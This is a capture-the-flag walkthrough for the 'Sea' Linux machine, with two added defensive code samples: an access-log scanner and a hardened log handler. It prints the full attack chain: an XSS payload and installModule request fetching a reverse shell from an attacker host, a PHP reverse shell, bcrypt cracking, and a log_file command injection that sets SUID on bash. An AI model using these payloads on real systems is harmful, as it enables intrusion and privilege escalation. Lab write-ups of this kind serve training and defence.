Sea
OS: Linux
Difficulty: Easy
Points: 20
Nmap Scan
nmap -v -p- --min-rate=5000 10.129.236.229
nmap -p 22,80 -sV -sC -oN nmap.txt 10.129.236.229
Nmap scan report for 10.129.236.229
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
We enumerate the web application's directories.
gobuster dir -u http://10.129.236.229/ -w /usr/share/wordlists/dirb/big.txt -t 20
/0 (Status: 200) [Size: 3685]
/404 (Status: 200) [Size: 3376]
/data (Status: 301) [Size: 235] [--> http://10.129.236.229/data/]
/home (Status: 200) [Size: 3685]
/messages (Status: 301) [Size: 239] [--> http://10.129.236.229/messages/]
/plugins (Status: 301) [Size: 238] [--> http://10.129.236.229/plugins/]
/themes (Status: 301) [Size: 237] [--> http://10.129.236.229/themes/]
gobuster dir -u http://10.129.236.229/themes/ -w /usr/share/wordlists/dirb/big.txt -t 20
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/404 (Status: 200) [Size: 3376]
/Documents and Settings (Status: 403) [Size: 199]
/Program Files (Status: 403) [Size: 199]
/bike (Status: 301) [Size: 242] [--> http://10.129.236.229/themes/bike/]
/contact us (Status: 403) [Size: 199]
/donate cash (Status: 403) [Size: 199]
gobuster dir -u http://10.129.236.229/themes/bike/ -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt -t 20
/admin/home (Status: 200) [Size: 3685]
/LICENSE (Status: 200) [Size: 1067]
/README.md (Status: 200) [Size: 318]
/sym/root/home/ (Status: 200) [Size: 3685]
/version (Status: 200) [Size: 6]
We find a README.md file that mentions the technology in use.
┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
We also locate the version.
┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/version
3.2.0
WonderCMS v3.2.0 (RCE)
We find the following exploit to obtain RCE.
For the script to work we need to make a few changes.
#var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = "http://sea.htb";
...
...
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.50/shell.zip&directoryName=violet&type=themes&token=" + token;
...
...
xhr4.open("GET", urlWithoutLogBase+"/themes/shell/rev.php");
...
...
xhr5.open("GET", urlWithoutLogBase+"/themes/shell/rev.php?lhost=" + ip + "&lport=" + port);
...
...
http://sea.htb/index.php?page=loginURL?"></form><script src="http://10.10.14.50/xss.js"></script><form action="
...
...
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+"/xss.js\"></script><form+action=\""
...
...
os.system("python3 -m http.server 80\n")
Now we create the zip file that will contain the reverse shell.
┌──(root㉿kali)-[~/Sea]
└─# mkdir shell
┌──(root㉿kali)-[~/Sea]
└─# cp /usr/share/webshells/php/php-reverse-shell.php shell/rev.php
We set our IP in the file.
$ip = '10.10.14.50'; // CHANGE THIS
$port = 1234; // CHANGE THIS
We create the zip.
┌──(root㉿kali)-[~/Sea]
└─# zip -r shell.zip shell/
adding: shell/ (stored 0%)
adding: shell/rev.php (deflated 59%)
We run the script.
python3 exploit.py 'http://sea.htb/loginURL' 10.10.14.50 1234
We send our payload through the contact form, in the website field.
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.50/xss.js"></script><form+action="
We wait a moment and get our reverse shell.
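As an added defensive example (not part of the original writeup), a small Python scanner over constructed Apache access-log lines that flags the three request patterns this chain leaves behind: HTML markup in the `page` parameter, an installModule pull from a host other than the site, and a direct request for a PHP file under /themes/. The site host set, the log format and the "theme PHP is never requested directly" baseline are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed Apache access-log sample (not captured from the box). The three
# hostile lines mirror the requests this writeup depends on: the XSS payload in
# the `page` parameter, the installModule call that fetches a remote zip, and
# the direct hit on the PHP file dropped under /themes/.
SAMPLE_LOG = """\
10.10.14.50 - - [12/Aug/2024:08:40:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 3685
10.10.14.50 - - [12/Aug/2024:08:41:12 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.50/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 3685
10.10.14.50 - - [12/Aug/2024:08:43:55 +0000] "GET /?installModule=http://10.10.14.50/shell.zip&directoryName=violet&type=themes&token=TOKEN_PLACEHOLDER HTTP/1.1" 200 120
10.10.14.50 - - [12/Aug/2024:08:44:02 +0000] "GET /themes/shell/rev.php?lhost=10.10.14.50&lport=1234 HTTP/1.1" 200 0
"""

SITE_HOSTS = {"sea.htb", "10.129.236.229"}  # assumed: hosts the CMS may legitimately fetch modules from
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
PHP_IN_MODULE_TREE = re.compile(r"^/(themes|plugins)/[^/]+/.*\.php$", re.I)


def analyze_request(target: str) -> list[str]:
    """Return the indicator names triggered by one request target (path + query)."""
    path, _, query = target.partition("?")
    findings = []
    # 1. HTML markup inside any query parameter: the writeup's stored-XSS vector
    #    closes the login form and injects a <script> tag via `page=`.
    if re.search(r"<\s*script|<\s*/\s*form", unquote_plus(query), re.I):
        findings.append("html_injection_in_query")
    # 2. Module install from a host that is not the site itself: with the admin
    #    token, installModule pulls a zip from an attacker-controlled server.
    for url in parse_qs(query, keep_blank_values=True).get("installModule", []):
        host = urlparse(url).hostname
        if host and host not in SITE_HOSTS:
            findings.append(f"remote_module_install:{host}")
    # 3. Assumed baseline: theme/plugin PHP files are included server-side and
    #    never requested directly, so a direct hit suggests a dropped web shell.
    if PHP_IN_MODULE_TREE.match(path):
        findings.append("php_under_module_tree")
    return findings


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (request target, indicators) for every log line that trips a rule."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (hits := analyze_request(m.group("target"))):
            alerts.append((m.group("target"), hits))
    return alerts
```

Running `scan_log(SAMPLE_LOG)` returns one alert per hostile line and nothing for the benign `page=home` request.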
Lateral Movement
We find a hash at the following path.
www-data@sea:/var/www/sea/data$ cat database.js
{
"config": {
"siteTitle": "Sea",
"theme": "bike",
"defaultPage": "home",
"login": "loginURL",
"forceLogout": false,
"forceHttps": false,
"saveChangesPopup": false,
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
It can be cracked, but we need to remove the backslashes first.
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
We crack the hash and obtain the password.
┌──(root㉿kali)-[~/Sea]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:42 DONE (2024-08-12 08:48) 0.02348g/s 71.86p/s 71.86c/s 71.86C/s chaparra..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We connect over SSH.
┌──(root㉿kali)-[~/Sea]
└─# ssh amay@sea.htb
amay@sea.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)
Last login: Mon Aug 12 12:50:20 2024 from 10.10.14.50
amay@sea:~$ id
uid=1000(amay) gid=1000(amay) groups=1000(amay)
Privilege Escalation
We see port 8080 open locally.
amay@sea:~$ netstat -putona
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN - off (0.00/0/0)
We forward that port to our machine.
ssh amay@sea.htb -L 8888:127.0.0.1:8080
An authentication prompt appears; we can use the same credentials.
amay : mychemicalromance
Testing the web application, we find a command injection of the following form.
log_file=;id;test&analyze_log=
From here we could do several things; we will set the SUID bit on the bash binary to escalate privileges.
log_file=;chmod 4777 /bin/bash;test&analyze_log=
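An added example (not the port-8080 application's actual code, which this writeup does not show) of the pattern behind the `log_file` injection next to a hardened handler: the unsafe variant only returns the command string a shell=True handler would build, while the safe one allowlists the file name, pins it inside the log directory and calls `wc` through an argv list. The log directory and its sample file are constructed stand-ins.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Hypothetical reconstruction of the log analyser's flaw; the unsafe variant
# only RETURNS the shell command it would have run, so nothing is executed.
LOG_DIR = Path(tempfile.mkdtemp())                              # stand-in for the server's log directory
(LOG_DIR / "access.log").write_text("line 1\nline 2\nline 3\n")  # constructed sample log

SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+\.log$")  # allowlist: a plain file name, no separators


def build_command_unsafe(log_file: str) -> str:
    """Command string as a concatenating shell=True handler would build it.
    The writeup's `;id;test` terminates `cat` and runs `id` as the service user."""
    return f"cat {LOG_DIR}/{log_file} | wc -l"


def analyze_log_safe(log_file: str) -> int:
    """Count the lines of an allowlisted log without ever invoking a shell."""
    if not SAFE_NAME.match(log_file):
        raise ValueError(f"rejected log name: {log_file!r}")
    target = (LOG_DIR / log_file).resolve()
    if target.parent != LOG_DIR.resolve():  # blocks ../ and symlink escapes
        raise ValueError("path escapes log directory")
    # argv list with shell=False: the name reaches wc as one literal argument,
    # and it has already been validated above, so no metacharacter survives.
    out = subprocess.run(["wc", "-l", str(target)], capture_output=True, text=True, check=True)
    return int(out.stdout.split()[0])


def rejects(log_file: str) -> bool:
    """True if the hardened handler refuses this value before touching the shell."""
    try:
        analyze_log_safe(log_file)
    except ValueError:
        return True
    return False
```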
Now from the terminal we can become root.
amay@sea:~$ /bin/bash -p
bash-5.0# id
uid=1000(amay) gid=1000(amay) euid=0(root) groups=1000(amay)
bash-5.0# cat /root/root.txt
3e050709de4f9b9c0c5affc3e5901a23
bash-5.0#